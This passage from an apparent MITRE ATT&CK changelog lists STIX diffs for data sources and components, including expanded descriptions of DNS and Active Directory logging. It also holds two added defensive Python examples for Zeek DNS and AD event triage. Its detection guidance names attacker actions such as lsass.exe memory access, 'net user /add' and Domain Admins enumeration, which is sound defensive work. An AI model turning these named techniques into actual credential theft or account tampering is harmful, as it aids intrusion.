---|---|---|
modified | 2022-03-30T14:26:51.806Z | 2025-04-18T15:12:13.134Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
iterable_item_added
STIX Field | Old value | New value |
---|---|---|
x_mitre_domains | | ics-attack |
[DS0023] Named Pipe
Current version: 1.0
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2022-03-30T14:26:51.806Z | 2025-04-16T20:39:09.639Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[DS0033] Network Share
Current version: 1.0
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2022-03-30T14:26:51.806Z | 2025-04-18T15:09:58.319Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
iterable_item_added
STIX Field | Old value | New value |
---|---|---|
x_mitre_domains | | ics-attack |
[DS0021] Persona
Current version: 1.0
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2021-10-20T15:05:19.273Z | 2025-04-16T20:39:12.210Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[DS0014] Pod
Current version: 1.0
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2021-11-10T09:30:48.697Z | 2025-04-16T20:39:12.521Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[DS0013] Sensor Health
Current version: 1.1
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2023-04-20T18:38:40.409Z | 2025-04-16T20:39:11.418Z |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[DS0020] Snapshot
Current version: 1.0
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2021-11-10T09:30:48.698Z | 2025-04-16T20:39:10.827Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[DS0034] Volume
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New value |
---|---|---|
x_mitre_deprecated | | False |
revoked | | False |
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2022-03-30T14:26:51.807Z | 2024-11-17T19:42:50.490Z |
external_references[2]['description'] | Microsoft. (n.d.). Azure Blob Storage. Retrieved October 13, 2021. | Microsoft. (n.d.). Azure Blob Storage. Retrieved November 17, 2024. |
external_references[2]['url'] | https://azure.microsoft.com/en-us/services/storage/blobs/ | https://azure.microsoft.com/en-us/products/storage/blobs/ |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[DS0005] WMI
Current version: 1.0
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2021-11-10T09:30:48.699Z | 2025-04-16T20:39:11.750Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[DS0006] Web Credential
Current version: 1.0
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2024-10-14T22:11:30.271Z | 2025-04-16T20:39:08.491Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[DS0024] Windows Registry
Current version: 1.0
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2022-05-11T14:00:00.188Z | 2025-04-16T20:39:08.970Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
mobile-attack
Minor Version Changes
[DS0017] Command
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2023-04-20T18:38:00.625Z | 2025-04-18T15:11:26.880Z |
x_mitre_version | 1.1 | 1.2 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_platforms[2] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New value |
---|---|---|
x_mitre_platforms | | ESXi |
x_mitre_domains | | ics-attack |
[DS0029] Network Traffic
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2023-04-20T18:38:13.356Z | 2025-04-18T15:11:13.424Z |
x_mitre_version | 1.1 | 1.2 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
iterable_item_added
STIX Field | Old value | New value |
---|---|---|
x_mitre_platforms | | ESXi |
x_mitre_domains | | ics-attack |
[DS0009] Process
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2023-04-20T18:38:26.515Z | 2025-04-18T15:10:24.655Z |
x_mitre_version | 1.1 | 1.2 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
iterable_item_added
STIX Field | Old value | New value |
---|---|---|
x_mitre_platforms | | ESXi |
x_mitre_domains | | ics-attack |
Patches
[DS0041] Application Vetting
Current version: 1.0
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2023-03-13T19:30:41.131Z | 2025-04-16T21:22:20.420Z |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[DS0013] Sensor Health
Current version: 1.1
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2023-04-20T18:38:40.409Z | 2025-04-16T20:39:11.418Z |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[DS0042] User Interface
Current version: 1.0
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2023-03-13T19:36:25.108Z | 2025-04-16T21:22:20.681Z |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
ics-attack
Minor Version Changes
[DS0015] Application Log
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2024-10-14T22:11:30.271Z | 2025-04-16T20:39:10.207Z |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
iterable_item_added
STIX Field | Old value | New value |
---|---|---|
x_mitre_platforms | | ESXi |
[DS0017] Command
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2023-04-20T18:38:00.625Z | 2025-04-18T15:11:26.880Z |
x_mitre_version | 1.1 | 1.2 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_platforms[2] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New value |
---|---|---|
x_mitre_platforms | | ESXi |
x_mitre_domains | | ics-attack |
[DS0022] File
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2022-12-07T19:35:34.863Z | 2025-04-18T15:10:04.845Z |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_platforms[1] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New value |
---|---|---|
x_mitre_platforms | | ESXi |
x_mitre_domains | | ics-attack |
[DS0028] Logon Session
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2024-10-14T22:11:30.271Z | 2025-04-18T15:12:19.778Z |
x_mitre_version | 1.1 | 1.2 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
iterable_item_added
STIX Field | Old value | New value |
---|---|---|
x_mitre_platforms | | ESXi |
x_mitre_domains | | ics-attack |
[DS0029] Network Traffic
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2023-04-20T18:38:13.356Z | 2025-04-18T15:11:13.424Z |
x_mitre_version | 1.1 | 1.2 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
iterable_item_added
STIX Field | Old value | New value |
---|---|---|
x_mitre_platforms | | ESXi |
x_mitre_domains | | ics-attack |
[DS0009] Process
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2023-04-20T18:38:26.515Z | 2025-04-18T15:10:24.655Z |
x_mitre_version | 1.1 | 1.2 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
iterable_item_added
STIX Field | Old value | New value |
---|---|---|
x_mitre_platforms | | ESXi |
x_mitre_domains | | ics-attack |
[DS0003] Scheduled Job
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2022-03-30T14:26:51.806Z | 2025-04-18T15:11:33.637Z |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
iterable_item_added
STIX Field | Old value | New value |
---|---|---|
x_mitre_platforms | | ESXi |
x_mitre_domains | | ics-attack |
[DS0012] Script
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2022-12-07T19:50:56.964Z | 2025-04-18T15:12:42.967Z |
x_mitre_version | 1.1 | 1.2 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
iterable_item_added
STIX Field | Old value | New value |
---|---|---|
x_mitre_platforms | | ESXi |
x_mitre_domains | | ics-attack |
[DS0019] Service
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2022-03-30T14:26:51.807Z | 2025-04-18T15:10:47.833Z |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
iterable_item_added
STIX Field | Old value | New value |
---|---|---|
x_mitre_platforms | | ESXi |
x_mitre_domains | | ics-attack |
[DS0002] User Account
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2024-10-14T22:11:30.271Z | 2025-04-18T15:09:38.667Z |
x_mitre_version | 1.1 | 1.2 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
iterable_item_added
STIX Field | Old value | New value |
---|---|---|
x_mitre_platforms | | ESXi |
x_mitre_domains | | ics-attack |
Patches
[DS0039] Asset
Current version: 1.0
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2023-03-24T19:14:15.637Z | 2025-04-16T21:26:35.809Z |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[DS0016] Drive
Current version: 1.0
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2022-03-30T14:26:51.804Z | 2025-04-18T15:12:29.888Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
iterable_item_added
STIX Field | Old value | New value |
---|---|---|
x_mitre_domains | | ics-attack |
[DS0001] Firmware
Current version: 1.0
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2022-03-30T14:26:51.805Z | 2025-04-18T15:12:49.401Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
iterable_item_added
STIX Field | Old value | New value |
---|---|---|
x_mitre_domains | | ics-attack |
[DS0011] Module
Current version: 1.0
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2022-03-30T14:26:51.806Z | 2025-04-18T15:12:13.134Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
iterable_item_added
STIX Field | Old value | New value |
---|---|---|
x_mitre_domains | | ics-attack |
[DS0033] Network Share
Current version: 1.0
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2022-03-30T14:26:51.806Z | 2025-04-18T15:09:58.319Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
iterable_item_added
STIX Field | Old value | New value |
---|---|---|
x_mitre_domains | | ics-attack |
[DS0040] Operational Databases
Current version: 1.0
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2023-03-24T19:14:55.615Z | 2025-04-16T21:26:35.400Z |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[DS0024] Windows Registry
Current version: 1.0
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2022-05-11T14:00:00.188Z | 2025-04-16T20:39:08.970Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Data Components
enterprise-attack
Minor Version Changes
Domain Name: Active DNS
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New value |
---|---|---|
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2022-05-02T23:19:55.148Z | 2025-04-18T15:16:37.830Z |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
description (old value):
Queried domain name system (DNS) registry data highlighting current domain to IP address resolutions (ex: dig/nslookup queries)
description (new value):
"Domain Name: Active DNS" data component captures queried DNS registry data that highlights current domain-to-IP address resolutions. This data includes both direct queries to DNS servers and records that provide mappings between domain names and associated IP addresses. It serves as a critical resource for tracking active infrastructure and understanding the network footprint of an organization or adversary. Examples:
- DNS Query Example: `nslookup example.com`, `dig example.com A`
- PTR Record Example: `dig -x 192.168.1.1`
- Tracking Malicious Domains: DNS logs reveal repeated queries to suspicious domains like malicious-site.com. The IPs resolved by these domains may be indicators of compromise (IOCs).
- DNS Record Types
  - A/AAAA Record: Maps domain names to IP addresses (IPv4/IPv6).
  - CNAME Record: Canonical name records, often used for redirects.
  - MX Record: Mail exchange records, used to route emails.
  - TXT Record: Can include security information like SPF or DKIM policies.
  - SOA Record: Start of authority record for domain management.
  - NS Record: Lists authoritative name servers for the domain.
This data component can be collected through the following measures:
- System Utilities: Use built-in tools like `nslookup`, `dig`, or host on Linux, macOS, and Windows to perform active DNS queries.
- DNS Logging
  - Windows DNS Server: Enable DNS Analytical Logging to capture DNS queries and responses.
  - Bind DNS: Enable query logging in the named.conf file.
- Cloud Provider DNS Logging
  - AWS Route 53: Enable query logging through CloudWatch or S3:
  - Google Cloud DNS: Enable logging for Cloud DNS queries through Google Cloud Logging.
- Network Traffic Monitoring: Use tools like Wireshark or Zeek to analyze DNS queries within network traffic.
- Security Information and Event Management (SIEM) Integration: Aggregate DNS logs in a SIEM like Splunk to create alerts and monitor patterns.
- Public OSINT Tools: Use OSINT platforms like VirusTotal, or PassiveTotal to collect information on domains and their associated IP addresses.
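The new Active DNS description says what to collect (Zeek or Wireshark DNS traffic, resolver logs) and what to look for (repeated queries to a suspicious domain, and the IPs it resolves to as candidate IOCs), but not how the two connect. The following is an added example, not code from the ATT&CK project or this changelog: it parses a constructed Zeek `dns.log` excerpt by its `#fields` header, finds hosts that repeatedly queried a watch-listed domain (or any of its subdomains, which the description does not spell out but is the usual generalization), and pulls the A/AAAA answers out as IOCs. The log lines, the watch-list and the "repeated" threshold are all assumptions made for the example.

```python
"""Repeated-query and resolved-IP extraction over a Zeek dns.log excerpt.

Added illustration for the 'Domain Name: Active DNS' data component; not
code from the ATT&CK project. The log excerpt, the watch-list and the
threshold below are constructed assumptions.
"""
from collections import Counter, defaultdict

# Constructed, abbreviated Zeek dns.log excerpt: tab-separated, with the
# '#fields' header real Zeek logs carry, but only the columns used here.
# Zeek writes '-' for an unset answers field and '(empty)' for an empty one.
SAMPLE_DNS_LOG = (
    "#fields\tts\tid.orig_h\tquery\tqtype_name\trcode_name\tanswers\n"
    "1700000001.1\t10.0.0.5\tmalicious-site.com\tA\tNOERROR\t203.0.113.7\n"
    "1700000002.2\t10.0.0.5\tcdn.malicious-site.com\tA\tNOERROR\t203.0.113.8,203.0.113.9\n"
    "1700000003.3\t10.0.0.5\tmalicious-site.com\tA\tNOERROR\t203.0.113.7\n"
    "1700000004.4\t10.0.0.9\texample.com\tA\tNOERROR\t192.0.2.10\n"
    "1700000005.5\t10.0.0.9\tmalicious-site.com\tA\tNXDOMAIN\t-\n"
    "1700000006.6\t10.0.0.5\t7.113.0.203.in-addr.arpa\tPTR\tNOERROR\t-\n"
)

WATCHLIST = {"malicious-site.com"}  # constructed watch-list (from the description's example)
MIN_QUERIES = 2                     # constructed threshold for "repeated"


def parse_zeek_dns(text):
    """Parse a Zeek dns.log body into dicts keyed by the names in '#fields'."""
    fields, records = None, []
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
            continue
        if not line or line.startswith("#"):  # other Zeek metadata lines
            continue
        if fields is None:
            raise ValueError("dns.log data appears before the #fields header")
        records.append(dict(zip(fields, line.split("\t"))))
    return records


def in_watchlist(query, watchlist):
    """True if query is a watch-listed name or one of its subdomains."""
    q = query.lower().rstrip(".")
    return any(q == d or q.endswith("." + d) for d in watchlist)


def repeated_watchlist_queries(records, watchlist=WATCHLIST, min_count=MIN_QUERIES):
    """Source host -> {queried name: count} for hosts that queried watch-listed
    names at least min_count times in total. Any rcode counts: an NXDOMAIN
    still shows the host tried to reach the domain."""
    per_host = defaultdict(Counter)
    for r in records:
        if in_watchlist(r["query"], watchlist):
            per_host[r["id.orig_h"]][r["query"].lower()] += 1
    return {h: dict(c) for h, c in per_host.items() if sum(c.values()) >= min_count}


def resolved_iocs(records, watchlist=WATCHLIST):
    """IPs that watch-listed names resolved to (A/AAAA answers only)."""
    ips = set()
    for r in records:
        if r.get("qtype_name") not in ("A", "AAAA"):
            continue
        if not in_watchlist(r["query"], watchlist):
            continue
        if r["answers"] in ("-", "(empty)"):
            continue
        ips.update(a for a in r["answers"].split(",") if a)
    return ips


if __name__ == "__main__":
    recs = parse_zeek_dns(SAMPLE_DNS_LOG)
    print(repeated_watchlist_queries(recs))
    print(sorted(resolved_iocs(recs)))
```

Parsing by the `#fields` header rather than by column position is what makes this robust to Zeek's real 24-column `dns.log` and to local log customizations; the PTR lookup in the sample is deliberately not matched, since reverse-lookup names live under `in-addr.arpa`, not under the watch-listed domain.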
Active Directory: Active Directory Credential Request
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:14:14.586Z |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
description (old value):
A user requested active directory credentials, such as a ticket or token (ex: Windows EID 4769)
description (new value):
Requests for authentication credentials via Kerberos or other methods like NTLM and LDAP queries. Examples:
- Kerberos TGT and Service Tickets (Event IDs 4768, 4769)
- NTLM Authentication Events
- LDAP Bind Requests
*Data Collection Measures:*
- Security Event Logging:
  - Enable "`Audit Kerberos Authentication Service`" or "`Audit Kerberos Service Ticket Operations`."
  - Captured Events: IDs 4768, 4769, 4624.
- Windows Event Forwarding (WEF): Forward domain controller logs to SIEM.
- SIEM Integration: Use tools like Splunk or Azure Sentinel for log analysis.
- Kerberos Debug Logging:
  - Registry Key: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters.
  - Set DWORD LogLevel to 1.
- Azure AD Logs: Monitor Sign-In Logs for authentication and policy issues.
- Enable EDR Monitoring:
  - Use EDR to detect suspicious processes querying authentication mechanisms (e.g., lsass.exe memory access).
Active Directory: Active Directory Object Access
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:14:08.230Z |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
description (old value):
Opening of an active directory object, typically to collect/read its value (ex: Windows EID 4661)
description (new value):
Object access refers to activities where AD objects (e.g., user accounts, groups, policies) are accessed or queried. Example: Windows Event ID 4661 logs object access attempts. Examples:
- Attribute Access: e.g., `userPassword`, `memberOf`, `securityDescriptor`.
- Group Enumeration: Enumerating critical group members (e.g., Domain Admins).
- User Attributes: Commonly accessed attributes like `samAccountName`, `lastLogonTimestamp`.
- Policy Access: Accessing GPOs to understand security settings.
*Data Collection Measures:*
- Audit Policies:
  - Enable "Audit Directory Service Access" under Advanced Audit Policies (Success and Failure).
  - Path: `Computer Configuration > Policies > Windows Settings > Security Settings > Advanced Audit Policy Configuration > Audit Policies > Object AccessEnable: Audit Directory Service Access` (Success and Failure).
  - Captured Events: IDs 4661, 4662.
- Event Forwarding: Use WEF to centralize logs for SIEM analysis.
- SIEM Integration: Collect and parse logs (e.g., 4661, 4662) using tools like Splunk or Azure Sentinel.
- Log Filtering:
  - Focus on sensitive objects/attributes like:
    - `Domain Admins` group.
    - `userPassword`, `ntSecurityDescriptor`.
- Enable EDR Monitoring:
  - Detect processes accessing sensitive AD objects (e.g., samAccountName, securityDescriptor).
  - Log all attempts to enumerate critical groups (e.g., "Domain Admins").
Active Directory: Active Directory Object Creation
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:14:20.946Z |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
description (old value):
Initial construction of a new active directory object (ex: Windows EID 5137)
description (new value):
Creating new objects in AD, such as user accounts, groups, organizational units (OUs), or trust relationships. Logged as Event ID 5137. Examples:
- User Account Creation: New user account.
- Group Creation: New security/distribution group.
- OU Creation: New organizational unit.
- Service Account Creation: New service account for automation or malicious tasks.
- Trust Object Creation: Trust relationship with another domain.
*Data Collection Measures:*
- Audit Policy:
  - Enable "Audit Directory Service Changes" (Success and Failure).
  - Path: `Computer Configuration > Policies > Windows Settings > Security Settings > Advanced Audit Policy Configuration > Audit Policies > Directory Service Changes`.
  - Key Event: Event ID 5137 (object creation).
- Log Forwarding: Use WEF to centralize logs for SIEM tools (e.g., Splunk).
- Enable EDR Monitoring:
  - Track processes that create new accounts or modify AD objects.
  - Correlate object creation with suspicious commands (e.g., net user /add).
Active Directory: Active Directory Object Deletion
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:14:17.768Z |
description | Removal of an active directory object (ex: Windows EID 5141) | Object deletion in AD (e.g., user accounts, groups, OUs) is logged as Event ID 5141. Examples:
- User Account: Deleted user.
- Group: Deleted security/distribution group.
- Organizational Unit (OU): Loss of configurations or policies.
- Service Account: Disrupted operations or cover tracks.
- Trust Object: Removed domain trust, disrupting connectivity.
*Data Collection Measures:*
- Audit Policy:
- Enable "Audit Directory Service Changes" (Success and Failure).
- Path: `Computer Configuration > Policies > Windows Settings > Security Settings > Advanced Audit Policy Configuration > Audit Policies > Directory Service Changes`.
- Key Event: Event ID 5141.
- Log Forwarding: Use WEF to centralize logs for SIEM tools (e.g., Splunk).
- Enable EDR Monitoring:
- Detect processes or users that initiate unauthorized object deletions.
- Monitor tools and scripts that may delete key directory objects. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Active Directory: Active Directory Object Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:14:11.376Z |
description | Changes made to an active directory object (ex: Windows EID 5163 or 5136) | Changes to AD objects (e.g., users, groups, OUs) are logged as Event ID 5136 (Object Modification) or 5163 (Attribute Changes). Examples:
- User Account: Modifying attributes (e.g., group membership, enabling/disabling accounts).
- Group Membership: Adding/removing members.
- OU: Changing properties/permissions (e.g., delegation).
- Service Account: Modifying SPNs or other attributes.
- Object Attributes: Changes to passwords, logon hours, or control flags.
*Data Collection Measures:*
- Audit Policy:
- Enable "Audit Directory Service Changes" (Success and Failure).
- Path: `Computer Configuration > Policies > Windows Settings > Security Settings > Advanced Audit Policy Configuration > Audit Policies > Directory Service Changes`.
- Key Events: 5136 (modifications), 5163 (attribute changes).
- Log Forwarding:
- Use WEF to centralize logs for SIEM.
- Parse logs to extract: Object Name, Attribute Changed, Initiator Account Name.
- Enable EDR Monitoring:
- Detect changes to critical attributes (e.g., memberOf, logonHours).
- Track processes modifying directory service objects (e.g., Set-ADUser or dsmod).
- Enable EDR Monitoring:
- Detect changes to critical attributes (e.g., memberOf, logonHours).
- Track processes modifying directory service objects (e.g., Set-ADUser or dsmod). |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
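The two data components above (Active Directory Object Deletion and Object Modification) tell the collector which event IDs to forward and which fields to extract, but not what a first-pass triage looks like once the events reach the SIEM. The following Python is an added example, not part of the ATT&CK changelog or MITRE's data: it normalizes constructed Directory Service Changes records (5136, 5137 and 5141) into the Object Name / Attribute Changed / Initiator columns named in the description, then flags deletions outside an approved provisioning account, changes to critical attributes, and creations by unexpected accounts. The domain, the account names `svc-provision` and `helpdesk7`, and the set of critical attributes are all assumptions made for the example.

```python
"""Triage Windows "Audit Directory Service Changes" events (IDs 5136/5137/5141).

The records below are constructed for this example; their keys follow the
EventData fields Windows writes for these events (SubjectUserName, ObjectDN,
ObjectClass, AttributeLDAPDisplayName, AttributeValue, OperationType).
"""
from collections import Counter

# Attributes whose modification (5136) usually warrants review. Group membership
# changes are logged on the *group* object as attribute "member"; "memberOf" is
# the back-link on the user and is not what 5136 reports, so both are listed.
CRITICAL_ATTRIBUTES = {
    "member", "memberOf", "logonHours", "userAccountControl",
    "servicePrincipalName", "msDS-AllowedToDelegateTo",
}

# OperationType message IDs used by 5136.
OPERATION = {"%%14674": "value added", "%%14675": "value deleted"}

# Object classes whose deletion (5141) is reviewed regardless of who did it.
SENSITIVE_CLASSES = {"organizationalUnit", "group", "trustedDomain"}

# Constructed sample: a hypothetical domain whose approved provisioning account
# is "svc-provision"; "helpdesk7" is an ordinary helpdesk user.
SAMPLE_EVENTS = [
    {"EventID": 5137, "SubjectUserName": "svc-provision", "ObjectClass": "user",
     "ObjectDN": "CN=jdoe,OU=Staff,DC=corp,DC=example"},
    {"EventID": 5136, "SubjectUserName": "svc-provision", "ObjectClass": "user",
     "ObjectDN": "CN=jdoe,OU=Staff,DC=corp,DC=example",
     "AttributeLDAPDisplayName": "telephoneNumber", "AttributeValue": "555-0100",
     "OperationType": "%%14674"},
    {"EventID": 5136, "SubjectUserName": "helpdesk7", "ObjectClass": "group",
     "ObjectDN": "CN=Domain Admins,CN=Users,DC=corp,DC=example",
     "AttributeLDAPDisplayName": "member",
     "AttributeValue": "CN=jdoe,OU=Staff,DC=corp,DC=example",
     "OperationType": "%%14674"},
    {"EventID": 5136, "SubjectUserName": "helpdesk7", "ObjectClass": "user",
     "ObjectDN": "CN=sql-svc,OU=Service,DC=corp,DC=example",
     "AttributeLDAPDisplayName": "servicePrincipalName",
     "AttributeValue": "MSSQLSvc/db01.corp.example:1433",
     "OperationType": "%%14674"},
    {"EventID": 5141, "SubjectUserName": "helpdesk7", "ObjectClass": "organizationalUnit",
     "ObjectDN": "OU=Finance,DC=corp,DC=example"},
    {"EventID": 5141, "SubjectUserName": "svc-provision", "ObjectClass": "user",
     "ObjectDN": "CN=temp-contractor,OU=Staff,DC=corp,DC=example"},
]


def normalize(event):
    """Extract the fields worth forwarding: object, attribute, initiator."""
    op = event.get("OperationType")
    return {
        "event_id": event["EventID"],
        "initiator": event["SubjectUserName"],
        "object": event["ObjectDN"],
        "object_class": event["ObjectClass"],
        "attribute": event.get("AttributeLDAPDisplayName"),
        "value": event.get("AttributeValue"),
        "operation": OPERATION.get(op, op),
    }


def triage(events, approved_initiators=frozenset({"svc-provision"})):
    """Return (reason, normalized_event) pairs for records that need review."""
    findings = []
    for raw in events:
        e = normalize(raw)
        if e["event_id"] == 5141:
            # Deletions: anything outside the provisioning account, or any
            # deletion of an OU, group or trust object whoever did it.
            if e["initiator"] not in approved_initiators or e["object_class"] in SENSITIVE_CLASSES:
                findings.append(("object-deleted", e))
        elif e["event_id"] == 5136 and e["attribute"] in CRITICAL_ATTRIBUTES:
            findings.append(("critical-attribute-changed", e))
        elif e["event_id"] == 5137 and e["initiator"] not in approved_initiators:
            findings.append(("object-created", e))
    return findings


def count_by_initiator(findings):
    """How many findings each account produced; useful for prioritising review."""
    return Counter(e["initiator"] for _, e in findings)


if __name__ == "__main__":
    for reason, e in triage(SAMPLE_EVENTS):
        print(f"{reason:26} {e['initiator']:14} {e['object']}  "
              f"{e['attribute'] or ''} {e['operation'] or ''}")
    print(dict(count_by_initiator(triage(SAMPLE_EVENTS))))
```

Run against the constructed records, the triage flags the `member` change on Domain Admins, the SPN change on the service account, and the OU deletion, all by `helpdesk7`; the routine provisioning activity by `svc-provision` passes through. The approved-initiator set and the critical-attribute list are the two knobs a team tunes against its own change process.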
Application Log: Application Log Content
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:09:35.474Z |
description | Logging, messaging, and other artifacts provided by third-party services (ex: metrics, errors, and/or alerts from mail/web applications) | Application Log Content refers to logs generated by applications or services, providing a record of their activity. These logs may include metrics, errors, performance data, and operational alerts from web, mail, or other applications. These logs are vital for monitoring application behavior and detecting malicious activities or anomalies. Examples:
- Web Application Logs: These logs include information about requests, responses, errors, and security events (e.g., unauthorized access attempts).
- Email Application Logs: Logs contain metadata about emails sent, received, or blocked (e.g., sender/receiver addresses, message IDs).
